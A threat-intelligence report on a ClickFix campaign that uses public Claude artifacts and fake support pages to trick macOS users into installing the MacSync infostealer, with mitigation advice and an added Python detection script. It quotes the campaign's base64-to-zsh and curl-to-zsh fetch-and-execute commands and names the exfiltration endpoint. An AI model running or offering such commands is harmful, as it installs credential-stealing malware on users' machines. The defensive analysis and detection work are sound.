Claude LLM Artifacts Exploited to Distribute Mac Infostealer Malware via ClickFix Attack Chain Targeting macOS Users

Executive Summary
A sophisticated cyberattack campaign has recently been identified in which public artifacts generated by Anthropic’s Claude LLM are abused to distribute Mac infostealer malware through the ClickFix attack chain. This campaign leverages malicious Google Ads and SEO poisoning to target macOS users seeking technical solutions, redirecting them to weaponized Claude artifacts or impersonated support articles. Unsuspecting users are tricked into executing malicious shell commands in their terminal, resulting in the installation of advanced infostealer malware. The campaign has demonstrated significant reach, with a single malicious Claude artifact receiving over 15,000 views, underscoring the critical risk to organizations and individuals relying on macOS systems.
Threat Actor Profile
The threat actors behind this campaign exhibit characteristics consistent with financially motivated cybercriminals, leveraging opportunistic and scalable attack vectors. While no direct attribution to a known Advanced Persistent Threat (APT) group has been established, the infrastructure, tactics, and procedures closely mirror those observed in previous ClickFix campaigns. The actors demonstrate a high degree of technical sophistication, utilizing public LLM-generated content to bypass traditional security controls and exploit user trust in reputable platforms such as Claude LLM and Medium. The campaign’s infrastructure, including domains such as raxelpak[.]com and a2abotnet[.]com, is designed for resilience and rapid deployment, facilitating both payload delivery and data exfiltration.
Technical Analysis of Malware/TTPs
The attack chain initiates with the user’s interaction with a malicious Claude artifact or a fake support article, both of which instruct the user to execute a shell command in the macOS Terminal. The observed commands include obfuscated payload delivery mechanisms, such as:
echo "<base64_payload>" | base64 -D | zsh
curl -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh
These commands download and execute a loader for the MacSync infostealer. The loader establishes command-and-control (C2) communication using hardcoded tokens and API keys, masquerading as legitimate macOS browser traffic to evade detection. The malware leverages osascript (AppleScript) to access sensitive data, including Keychain credentials, browser-stored information, and cryptocurrency wallets. Stolen data is archived into /tmp/osalogging.zip and exfiltrated via HTTP POST requests to a2abotnet[.]com/gate. If exfiltration fails, the archive is split and transmission is retried up to eight times, ensuring data theft even under adverse network conditions. Post-exfiltration, the malware performs comprehensive cleanup to remove forensic traces.
The campaign’s technical sophistication is further evidenced by its evasion of macOS Gatekeeper protections, use of living-off-the-land binaries (LOLBins) such as osascript, and dynamic payload delivery infrastructure. The attack chain is modular, allowing rapid adaptation and deployment of new payloads or delivery mechanisms as detection improves.
Exploitation in the Wild
This campaign has been observed in active exploitation, with over 15,600 views recorded on a single malicious Claude artifact, as reported by Moonlock Lab (MacPaw). The attack leverages high-traffic search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” ensuring a broad victim pool. Similar campaigns have previously abused ChatGPT and Grok chat sharing features to deliver the AMOS infostealer, indicating a trend of exploiting public LLM artifacts for malware distribution. The use of Google Ads and SEO poisoning amplifies the campaign’s reach, enabling the threat actors to target both individual users and enterprise environments indiscriminately.
Security researchers from Moonlock Lab and AdGuard have documented the campaign’s evolution, noting the rapid adaptation of social engineering techniques and payload delivery methods. The campaign’s infrastructure is robust, with multiple fallback domains and payload variants observed in the wild.
Victimology and Targeting
The primary targets of this campaign are macOS users, particularly those seeking technical solutions or troubleshooting advice via search engines. The attack is not limited to a specific industry or geographic region, as the use of generic technical queries ensures a wide victim base. However, the campaign poses heightened risks to organizations with a significant macOS footprint, including technology firms, creative industries, and financial institutions. The malware’s focus on credential theft, browser data, and cryptocurrency wallets suggests a dual objective of financial gain and potential access to sensitive corporate resources.
Victims are typically lured through search engine results or sponsored ads and redirected to weaponized Claude artifacts or impersonated support articles. Because the compromise relies on user-initiated command execution, it bypasses many traditional endpoint security controls, making user awareness and technical controls critical for mitigation.
Mitigation and Countermeasures
Organizations and individuals can reduce their exposure to this threat through a combination of user education, technical controls, and proactive monitoring. Users should be trained to avoid executing shell commands from untrusted sources, especially those found in public LLM artifacts or unofficial support articles. The legitimacy of technical guides and scripts should always be verified before execution.
From a technical perspective, network controls should be implemented to block access to known malicious domains, including raxelpak[.]com and a2abotnet[.]com. Endpoint monitoring should be configured to detect suspicious use of osascript, unexpected archive creation in /tmp/, and outbound HTTP POST requests to unrecognized domains. Security teams should maintain up-to-date threat intelligence feeds and regularly review indicators of compromise (IOCs) associated with this campaign.
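The monitoring guidance above, as an added example that is not part of the original report: a small Python triage routine that applies the report's indicators and behavioural checks to constructed EDR-style telemetry records. The event schema, the ALLOWED_POST_HOSTS allowlist and the "osascript with an inline -e script" heuristic are assumptions of this example; the two domains and the /tmp/osalogging.zip path are the ones the report names.

```python
import re
from dataclasses import dataclass

# Network indicators named in the report. The report defangs them with "[.]";
# defang() reverses that so the same strings can be used for matching.
def defang(domain: str) -> str:
    return domain.replace("[.]", ".").strip().lower()

KNOWN_C2_DOMAINS = {defang(d) for d in ("raxelpak[.]com", "a2abotnet[.]com")}
KNOWN_STAGING_PATHS = {"/tmp/osalogging.zip"}

# Hypothetical allowlist of hosts the organisation expects outbound POSTs to;
# a POST to anything else is reported at low severity as "unrecognised".
ALLOWED_POST_HOSTS = {"api.example-internal.test", "updates.apple.com"}

# Command-line shapes of the ClickFix stage described in the report:
# a base64-decoded blob piped straight into zsh, or curl output piped into zsh.
# The patterns also accept bash/sh so a trivial substitution does not dodge them.
SHELL_PIPE_RULES = [
    ("clickfix_base64_pipe", re.compile(r"base64\s+(?:-D|-d|--decode)\b.*\|\s*(?:zsh|bash|sh)\b")),
    ("clickfix_curl_pipe", re.compile(r"\bcurl\b.*\|\s*(?:zsh|bash|sh)\b")),
]


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    detail: str


def analyse_event(event: dict) -> list[Alert]:
    """Apply the report's detection guidance to one telemetry record.

    event["type"] is one of "process", "file" or "network"; the remaining keys
    follow a constructed, EDR-like schema, not any specific product's format."""
    alerts: list[Alert] = []
    kind = event.get("type")

    if kind == "process":
        cmd = event.get("cmdline", "")
        for rule, pattern in SHELL_PIPE_RULES:
            if pattern.search(cmd):
                alerts.append(Alert(rule, "high", cmd))
        # osascript run with an inline script (-e) is flagged as the LOLBin use the
        # report calls out; runs of a .scpt file are left alone. This is a heuristic
        # choice for the example, not a distinction the report itself makes.
        if re.match(r"^\s*(?:/usr/bin/)?osascript\b", cmd) and " -e " in f" {cmd} ":
            alerts.append(Alert("osascript_inline_script", "medium", cmd))

    elif kind == "file":
        path = event.get("path", "")
        if path in KNOWN_STAGING_PATHS:
            alerts.append(Alert("ioc_staging_archive", "high", path))
        elif path.startswith("/tmp/") and path.endswith((".zip", ".tar", ".tar.gz")):
            alerts.append(Alert("archive_created_in_tmp", "medium", path))

    elif kind == "network":
        host = defang(event.get("host", ""))
        if host in KNOWN_C2_DOMAINS:
            alerts.append(Alert("ioc_c2_domain", "high", host))
        elif event.get("method", "").upper() == "POST" and host not in ALLOWED_POST_HOSTS:
            alerts.append(Alert("post_to_unrecognised_host", "low", host))

    return alerts


def analyse_events(events) -> list[Alert]:
    return [alert for event in events for alert in analyse_event(event)]


# Constructed sample telemetry modelled on the chain in the report (not real logs).
# The hash segment of the curl URL is a placeholder.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": 'echo "aGVsbG8=" | base64 -D | zsh'},
    {"type": "process", "cmdline": 'curl -SsLfk --compressed "https://raxelpak[.]com/curl/PLACEHOLDER_HASH" | zsh'},
    {"type": "process", "cmdline": "osascript -e 'display dialog \"x\"'"},
    {"type": "process", "cmdline": "osascript /Users/me/Library/Scripts/backup.scpt"},
    {"type": "file", "path": "/tmp/osalogging.zip"},
    {"type": "file", "path": "/tmp/export.zip"},
    {"type": "network", "method": "POST", "host": "a2abotnet[.]com", "path": "/gate"},
    {"type": "network", "method": "POST", "host": "collector.unknown-vendor.test"},
    {"type": "network", "method": "GET", "host": "www.apple.com"},
]

if __name__ == "__main__":
    for alert in analyse_events(SAMPLE_EVENTS):
        print(f"[{alert.severity:6}] {alert.rule}: {alert.detail}")
```

The exact-match rules (the two domains and the staging path) will go stale as the infrastructure rotates, so the behavioural rules (a shell fed from base64 or curl, inline osascript, archives appearing in /tmp/, POSTs to hosts outside an allowlist) are the part worth keeping in a production detection; the IoC set is there for the current campaign and should be refreshed from threat intelligence feeds as the report recommends.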
Organizations are encouraged to implement application whitelisting, restrict the execution of unsigned scripts, and enforce the principle of least privilege on macOS endpoints. Regular security awareness training and simulated phishing exercises can further reduce the risk of user-initiated compromise.
References
- BleepingComputer: Claude LLM artifacts abused to push Mac infostealers in ClickFix attack
- Moonlock Lab (MacPaw) - Twitter
- AdGuard - Malicious HomeBrew search results
- MITRE ATT&CK Techniques: T1059.004, T1555, T1041
- OpenText Cybersecurity Community: Claude LLM artifacts abused to push Mac infostealers in ClickFix attack
- Cybersecurity News: Threat actors exploit Claude artifacts and Google Ads
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring robust protection for critical assets and business operations.
For further information or to discuss tailored threat intelligence solutions, we are happy to answer questions at ops@rescana.com.